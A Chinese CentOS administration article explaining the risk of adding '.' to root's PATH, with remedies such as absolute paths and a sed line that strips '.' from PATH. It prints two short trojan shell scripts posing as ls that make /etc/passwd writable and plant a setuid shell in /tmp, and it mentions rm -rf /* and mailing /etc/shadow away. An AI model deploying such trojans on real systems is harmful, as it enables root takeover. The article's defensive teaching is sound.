脚本之家 服务器常用软件
快捷导航
您的位置:主页 > 操作系统 > RedHat/Centos >

centos环境变量如何设置安全问题?

  发布时间:2017-01-13 15:45:50   作者:佚名   我要评论
很多朋友不知道centos环境变量如何设置安全问题?今天小编将为大家带来centos 环境变量设置安全问题;希望对大家会有帮助,有需要的朋友一起去看看吧

.是代表当前目录。如果将这点写入root的环境变量,执行脚本时,你只需要打脚本的名字,系统就会在当前的目录下找该脚本并执行。

例如,一个U盘插入电脑,你打了一个文件名字,系统就会执行U盘中的该文件,如果有木马程序,也会被执行,比如脚本中有rm -rf /* 这样的命令,你的系统就会被删除。

设想一下,有一个人在一个他能写的目录下写了一个名为ls的可执行程序,程序会把/etc/shadow文件发送到某一邮箱,而root又恰巧在那个目录下,想ls下,结果是什么呢?

所以,很多安全要求高的Unix系统甚至要求用绝对路径调用命令

本文主要讲述“.”在LINUX的环境变量PATH中所带来的问题,及解决的几种方法。

正如很多人所知道的$PATH环境变量里存着一张目录列表,当用户要执行某一程序时,系统就会按照列表中的内容去查找该程序的位置。当程序名前不带点斜线 . / 时$PATH就会起作用。

对于普通用户和root用户$PATH里默认是不包含"."来指定用户的当前目录。这在本机进行脚本开发的程序员来说却不方便,想图省事的人就把点加到了搜索路径中,这就等于在你的系统埋下了险情。

例如:root为了方便使用在他的当前路径末尾加了个点"."(搜索目录为代表当前目录)

命令操作如下:

[root@rh root]# PATH=$PATH:.

[root@rh root]# echo $PATH

/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin:.

这下是方便了,直接输入脚本名就能执行。OK,正常情况下一点问题没有,也省去了输入./foo.sh的烦恼(foo.sh是我假设的脚本文件名)。有的root把PATH=$PATH:.这条命令加到了profile里,使所有用户到分享你给他们带来的"福音"。更有胜者root用户竟然PATH=.:$PATH(将":"加到路径前是另一种形式)。正常请况下一点问题没有,直到有一天,张三用户在他的主目录下放了名为lls的脚本,并对root说他的系统出问题了希望root能帮他解决。(其实是一个trap)。Root一上来就su 成管理员权限,紧更着列了一下目录。有可能管理员误敲成了lls,结果哈哈。。。。

以下是个简单的C shell 的例子

#!/bin/csh

If ( ! -o /bin/su )

goto finish

cp /bin/sh /tmp/.sh

chmod 7777 /tmp/.sh

finish :

exec /bin/ls $argv | grep -v ls

稍微变形就有个B shell的

#!/bin/sh

if chmod 666 /etc/passwd > /dev/null 2>&1 ;then

cp /bin/sh /tmp/.sh

chmod 4755 /tmp/.sh

fi

exec ls "$@"

如果root将其环境变量$PATH包含了"."并且其位置先与ls所在的系统目录,那么当用户在/tmp中执行ls时,执行的是上面给出的脚本,而不是实际的ls命令,因为最终还是执行了ls,所以root不会看出有任何异常。如果是root执行了该脚本,就会将口令文件设置为可写,并将shell复制到/tmp保存为.sh,同时设置其setuserid位,所有这一切都非常安静地发生。

在以上这两个程序里,心怀不鬼的人能写入任何令root急的要跳楼的程序,部下陷阱等root来钻,也许root在不知不觉中施行了也根本不会察觉。 也许在张三的主目录下有一个名为ps的脚本里面包含有危险脚本,root可能一到他的机器前就输入了ps,此时系统会首先到当前目录下搜索,结果/sbin/ps却不被执行。类似这样的小花招还有很多。

管理员同志,不要太紧张,下面我说说解决办法。

首先,要养成输绝对路径的良好命令行输入习惯,这样就不会让"不法份子"乘虚而入了。比如,列目录最好用/bin/ls来列目录,不要图方便而冒然输入ls。

其次,根用户(root)不要把"."包括到搜索目录列表里,而普通用户如果个"."包括到搜索列表中的话别,则"."就应当放在搜索目录列表的最后位置上。这样一来普通用户不会受到前面所述的那种危害。

最后,可以在登陆时在/etc/profile 和bashrc .profile文件的末尾添加如下一行

[PATH=`echo $PATH |sed -e 's/::/:/g; s/:.:/:/g; s/:.$//; s/^://' `

这个简单的sed命令将删除路径里所有的"."包括其另一形式"::"

还可以由crontab调用定期执行

#find / ! -fstype proc '(' -name '.??*' -o -name '.[^.]' ')' > point.txt ; mail -s 'this is a pointlist' root@localhost < point.txt

来搜索所有以点开头的文件,再发送到root的邮箱里,再进行比较等任务。

相关文章

  • CentOS 添加环境变量的三种方法(图文教程)

    有用户反映不知道如何在CentOS环境下添加环境变量,其实方法很简单的,下面小编就为大家介绍三种CentOS添加环境变量上网方法,希望可以帮助到大家
    2016-11-09

  • centos yum只更新安全补丁操作

    今天小编为大家带来的是centos yum只更新安全补丁操作;希望可以帮助到大家;有需要的朋友可以过来看看
    2016-12-11

  • CentOS VPS入手后的基本优化和安全配置

    这篇文章主要介绍了CentOS VPS入手后的基本优化和安全配置,本文涉及升级防火墙策略、删除不用的应用、清理不需要的用户和用户组、更改时区等方面,需要的朋友可以参考下
    2014-12-30

  • CentOS 6.5服务器安全加固及性能优化

    这篇文章为大家介绍下通过调整系统参数来提高系统内存、CPU、内核资源的占用,通过禁用不必要的服务、端口,来提高系统的安全性,更好的发挥系统的可用性。通过自己对Linux
    2014-03-18

  • CentOS 6 的安全配置(CentOS Linux服务器安全设置)

    CentOS服务器得到了很多的网友的拥护。如何设置CentOS服务器的安全性呢?下面,就从以下几个方面说说centos 6的安全设置:系统安全记录文件、启动和登录安全性、限制网络访
    2012-11-06

  • CentOS系统环境精简优化详解

    今天小编将为大家带来通过6步骤,完成对centos精简和优化讲解。希望对大家会带来帮助,有需要的朋友一起去看看吧
    2017-01-08

  • centos如何安装桌面环境?centos安装桌面环境的方法

    默认最小化安装,或者因为需要,在安装系统的时候没有安装桌面组建,一些朋友不知道centos如何安装桌面环境?今天小编为大家带来了centos安装桌面环境的方法;有需要的朋友
    2016-12-16

  • CentOS 6.3下安装部署CHEF环境教程

    这篇文章主要介绍了CentOS 6.3下安装部署CHEF环境教程,Chef是由Ruby与Erlang写成的配置管理软件,它以一种纯Ruby的领域专用语言(DSL)保存系统配置“食谱(recipes)”或“做饭
    2014-09-10

  • CentOS 6.2系统安装和基本软件环境配置

    这两天在整公司出问题的服务器,顺手记录了以下过程,供以后参考,也可以供大家学习参考
    2013-12-03

  • CentOS搭建LAMP服务器环境硬盘分区方案分享

    我们在使用Linux作为服务器的过程中,经常会对硬盘中分区如何更合理的分配而感觉疑惑,特别是刚开始接触Linux的朋友,对于服务器中硬盘空间各分区的合理分配,心中也没有底
    2013-06-07

最新评论

关注微信公众号

扫一扫